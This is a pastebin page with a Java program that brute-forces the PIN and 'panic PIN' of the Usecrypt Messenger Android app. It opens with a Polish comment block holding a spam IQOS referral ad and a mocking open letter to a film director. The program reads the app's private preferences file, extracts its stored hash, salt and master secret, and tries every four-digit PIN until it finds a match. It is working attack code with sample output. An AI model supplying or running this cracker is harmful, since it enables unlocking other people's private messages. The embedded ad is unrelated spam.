Facebook
From Walloping Gorilla, 1 Month ago, written in Java 5.
This paste is a reply to UsecryptMessengerCracker from student2roku - view diff
Embed
Download Paste or View Raw
Hits: 724
  1. /*
  2.  
  3. !!!MEGA PROMOCJA!!! Kupon na zakup IQOS 2.4 Plus za  99zĹ‚ lub IQOS Multi za 200 zĹ‚ oraz IQOS 3 DUO za 250 zĹ‚!! SUPER okazja!! Dodatkowo w gratisie kilka paczek Heets.( po zakupie i wypeĹ‚nieniu ankiet 10-15 paczek za free). Oficjalna i pewna oferta!
  4. Na stronie IQOS po wybraniu produktu w koszyku wpisujecie kod rabatowy : NQO9G2J
  5. Dostajecie rabat oraz dodatkowe BONUSOWE Paczki !!!!!!
  6. Promocja działa tylko po wpisaniu kodu!
  7.  
  8. https://polecam.iqosclub.pl/polecam?a=NQO9G2J
  9.  
  10. List otwarty do Patryka Vegi
  11.  
  12. Drogi Patryku. Ustalmy na wstepie - jestes rezyserem i znasz sie na branzy filmowej. Nie znasz sie
  13. na komputerach, sieciach ani tym bardziej kryptografii. Reklamujesz Usecrypt Messengera i niestety
  14. twoi nowi koledzy robia z Ciebie debila.
  15.  
  16. Mowisz, ze fachowcy z Mossadu zabrali telefon z Usecryptem i nie odzywali sie przez dwa miesiace. Wiesz
  17. czemu? Bo przez bite dwa miesiace nie mogli przestac sie smiac. Zlamanie zabezpieczen Usecrypt Messengera
  18. to nie zadanie dla Mossadu tylko dla mnie, studenta drugiego roku informatyki.
  19.  
  20. Patryku, nie mam dla ciebie dobrych wiadomosci. Jesli zlosliwe oprogramowanie odczyta plik
  21. /data/data/uc.messenger/shared_prefs/SecureSMS-Preferences.xml z twojego telefonu z Androidem, a to naprawde
  22. latwe gdy jest sie zlosliwym oprogramowaniem, to oba PIN-y (ten zwykly i ten paniczny) stoja otworem.
  23.  
  24. Wiem, ze ciezko bedzie Ci w to uwierzyc, wiec zalaczam program za pomoca ktorego mozna zlamac zabezpieczenia
  25. Usecrypt Messengera. Potrzebuje on do dzialania pliku SecureSMS-Preferences.xml z prywatnego katalogu Usecrypt
  26. Messengera. Uruchamiasz program z nazwa tego pliku jako parametrem, czekasz krotka chwile i dostajesz na
  27. ekranie najpierw Panic PIN a potem PIN.
  28.  
  29. Serdecznie Cie pozdrawiam
  30. Student II roku (nie napisze, ktorej uczelni)
  31.  
  32. PS: nie reklamuj wiecej komunikatorow, OK?
  33.  
  34.  
  35. ----
  36.  
  37. Do uruchomienia niniejszego programu potrzebujesz bibliotek
  38.  
  39. Google_Protocol_Buffers_support_0.5.9
  40. axolotl-java-1.4.2
  41. protobuf-java-2.5.0
  42. curve25519-java-0.2.4
  43. org.bouncycastle:bcprov-ext-jdk14:1.51
  44.  
  45. ----
  46. Przykladowe uruchomienie:
  47.  
  48. Usecrypt Messenger mega h@x0r double PIN cracker
  49. Looking for PANIC PIN, max: 9999
  50. checking 3333
  51. PANIC PIN found: 3333
  52. Looking for PIN, max: 9999
  53. checking 1111
  54. PIN found: 1111
  55.  
  56.  
  57. */
  58.  
  59. import org.bouncycastle.jce.provider.BouncyCastleProvider;
  60. import org.bouncycastle.util.encoders.Base64;
  61. import org.w3c.dom.Document;
  62. import org.w3c.dom.Element;
  63. import org.w3c.dom.Node;
  64. import org.whispersystems.libaxolotl.IdentityKey;
  65. import org.whispersystems.libaxolotl.InvalidKeyException;
  66. import javax.crypto.Mac;
  67. import javax.crypto.SecretKeyFactory;
  68. import javax.crypto.spec.PBEKeySpec;
  69. import javax.crypto.spec.SecretKeySpec;
  70. import javax.xml.parsers.DocumentBuilder;
  71. import javax.xml.parsers.DocumentBuilderFactory;
  72. import java.io.File;
  73. import java.security.MessageDigest;
  74. import java.security.NoSuchAlgorithmException;
  75. import java.security.Security;
  76. import java.util.Arrays;
  77.  
  78. public class UsecryptMessengerCracker {
  79.  
  80.     final int max_pin = 9999;
  81.  
  82.     int xml_passphrase_iterations= 20000;
  83.     String xml_master_secret=null;
  84.     String xml_pref_identity_public_v3=null;
  85.     String xml_panic_hash=null;
  86.     String xml_mac_salt=null;
  87.  
  88.     public static void main(String[] args) {
  89.         UsecryptMessengerCracker d = new UsecryptMessengerCracker();
  90.         d.crackUsecryptMessenger(args);
  91.     }
  92.  
  93.     public void crackUsecryptMessenger(String[] args) {
  94.         Security.addProvider(new BouncyCastleProvider());
  95.  
  96.         System.out.println("Usecrypt Messenger mega h@x0r double PIN cracker");
  97.  
  98.         if (args.length != 1){
  99.             System.out.println("You need to provide a Usecrypt Messenger XML file from Android phone as a parameter");
  100.             System.out.println("This is the one you need: /data/data/uc.messenger/shared_prefs/SecureSMS-Preferences.xml");
  101.             System.exit(-1);
  102.         }
  103.  
  104.         if (!new File(args[0]).exists()){
  105.             System.out.println("File does not exist: "+args[0]);
  106.             System.exit(-2);
  107.         }
  108.  
  109.         DocumentBuilderFactory dbFactory = DocumentBuilderFactory.newInstance();
  110.         try {
  111.             DocumentBuilder dBuilder = dbFactory.newDocumentBuilder();
  112.             Document doc = dBuilder.parse(new File(args[0]));
  113.  
  114.  
  115.             Element map = doc.getDocumentElement();
  116.             for (int i = 0; i < map.getChildNodes().getLength(); i++){
  117.                 Node n = map.getChildNodes().item(i);
  118.  
  119.                 String name = n.getNodeName();
  120.                 if (name.equals("string") && n.hasAttributes()  ){
  121.                     Node attrib = n.getAttributes().item(0);
  122.                     if (attrib.getNodeValue().equals("master_secret")){
  123.                         xml_master_secret = n.getTextContent();
  124.                     }
  125.                     if (attrib.getNodeValue().equals("pref_identity_public_v3")){
  126.                         xml_pref_identity_public_v3 = n.getTextContent();
  127.                     }
  128.                     if (attrib.getNodeValue().equals("panic_hash")){
  129.                         xml_panic_hash = n.getTextContent();
  130.                     }
  131.                     if (attrib.getNodeValue().equals("mac_salt")){
  132.                         xml_mac_salt = n.getTextContent();
  133.                     }
  134.                 }
  135.  
  136.                 if (name.equals("int") && n.hasAttributes()  ){
  137.                     Node attrib = n.getAttributes().item(0);
  138.                     if (attrib.getNodeValue().equals("passphrase_iterations")){
  139.                         String v = n.getAttributes().item(1).getTextContent();
  140.                         xml_passphrase_iterations = Integer.parseInt(v);
  141.                     }
  142.                 }
  143.             }
  144.         } catch (Exception e) {
  145.             System.out.println("Error parsing XML: "+e.toString());
  146.             System.exit(-3);
  147.         }
  148.  
  149.         if (xml_master_secret==null || xml_pref_identity_public_v3==null || xml_panic_hash==null || xml_mac_salt==null){
  150.             System.out.println("XML does not contain all required fields: ");
  151.             System.exit(-4);
  152.         }
  153.  
  154.         byte[] panic_hash_decoded = Base64.decode(xml_panic_hash);
  155.  
  156.  
  157.         String ret = findPanicPIN(max_pin, panic_hash_decoded, xml_pref_identity_public_v3);
  158.         if (ret != null){
  159.             System.out.println("PANIC PIN found: "+ret);
  160.         }else{
  161.             System.out.println("PANIC PIN not found");
  162.         }
  163.  
  164.         ret = findMasterSecret(max_pin, xml_master_secret, xml_mac_salt);
  165.         if (ret != null){
  166.             System.out.println("PIN found: "+ret);
  167.         }else{
  168.             System.out.println("PIN not found");
  169.         }
  170.     }
  171.  
  172.  
  173.     public String findPanicPIN(int max, byte[] panic_hash_decoded, String pref_identity_public_v3) {
  174.         System.out.println("Looking for PANIC PIN, max: "+max);
  175.  
  176.         for (int i=0; i<max+1; i++){
  177.             String s = String.valueOf(i);
  178.             System.out.print("checking ");
  179.             System.out.print(s);
  180.             System.out.print("\r");
  181.             if(validatePanicPIN(s, panic_hash_decoded, pref_identity_public_v3)){
  182.                 System.out.println("");
  183.                 return s;
  184.             }
  185.         }
  186.  
  187.         System.out.println("");
  188.  
  189.         return null;
  190.  
  191.     }
  192.  
  193.     public boolean validatePanicPIN(String pin, byte[] panic_hash_decoded, String pref_identity_public_v3)  {
  194.  
  195.         byte[] b2 = new byte[0];
  196.         try {
  197.             b2 = getHashFromPassphrase(new IdentityKey(Base64.decode(pref_identity_public_v3), 0).serialize(), pin);
  198.         } catch (InvalidKeyException e) {
  199.             e.printStackTrace();
  200.         }
  201.  
  202.         if (Arrays.equals(panic_hash_decoded,b2)) {
  203.             return true;
  204.         }else{
  205.             return false;
  206.         }
  207.     }
  208.  
  209.  
  210.     private static byte[] getHashFromPassphrase(byte[] var0, String var1) {
  211.         byte[] var3 = var1.getBytes();
  212.         byte[] var2 = new byte[var3.length + var0.length];
  213.         System.arraycopy(var3, 0, var2, 0, var3.length);
  214.         System.arraycopy(var0, 0, var2, var3.length, var0.length);
  215.         byte[] var01 = var2;
  216.         try {
  217.             MessageDigest var11 = MessageDigest.getInstance("SHA-256");
  218.             var11.update(var01);
  219.             var01 = var11.digest();
  220.         } catch (NoSuchAlgorithmException var21) {
  221.             var01 = null;
  222.         }
  223.  
  224.         return var01;
  225.     }
  226.  
  227.     public String findMasterSecret(int max, String master_secret, String mac_salt) {
  228.         System.out.println("Looking for PIN, max: "+max);
  229.  
  230.         byte[] master_secret_decoded = Base64.decode(master_secret);
  231.         byte[] mac_salt_decoded = Base64.decode(mac_salt);
  232.  
  233.         for (int i=0; i<max+1; i++){
  234.             String candidatePass = String.valueOf(i); // in case of alphanum passwords, try different candidates values here
  235.             System.out.print("checking ");
  236.             System.out.print(candidatePass);
  237.             System.out.print("\r");
  238.             if(true == verifyMasterPIN(candidatePass, master_secret_decoded, mac_salt_decoded, xml_passphrase_iterations)){
  239.                 System.out.println("");
  240.                 return candidatePass;
  241.             }
  242.         }
  243.         System.out.println("");
  244.         return null;
  245.     }
  246.  
  247.  
  248.     public boolean verifyMasterPIN(String pin, byte[] master_secret_decoded, byte[] mac_salt_decoded, int passphrase_iterations)  {
  249.  
  250.         try {
  251.             int var4 = passphrase_iterations;
  252.             byte[] var0 = mac_salt_decoded;
  253.             PBEKeySpec var32 = new PBEKeySpec(pin.toCharArray(), var0, var4);
  254.             SecretKeySpec var41 = new SecretKeySpec(SecretKeyFactory.getInstance("PBEWITHSHA1AND128BITAES-CBC-BC").generateSecret(var32).getEncoded(), "HmacSHA1");
  255.             Mac var31 = Mac.getInstance("HmacSHA1");
  256.             var31.init(var41);
  257.             Mac var411 = var31;
  258.             var0 = new byte[master_secret_decoded.length - var411.getMacLength()];
  259.             System.arraycopy(master_secret_decoded, 0, var0, 0, var0.length);
  260.             byte[] var5 = new byte[var411.getMacLength()];
  261.             System.arraycopy(master_secret_decoded, master_secret_decoded.length - var411.getMacLength(), var5, 0, var5.length);
  262.             if (Arrays.equals(var5, var411.doFinal(var0))) {
  263.                 return true;
  264.             } else {
  265.                 return false;
  266.             }
  267.         } catch (Exception e) {
  268.             //System.out.println(e.toString());
  269.             return false;
  270.         }
  271.  
  272.     }
  273.  
  274.  
  275. }
  276.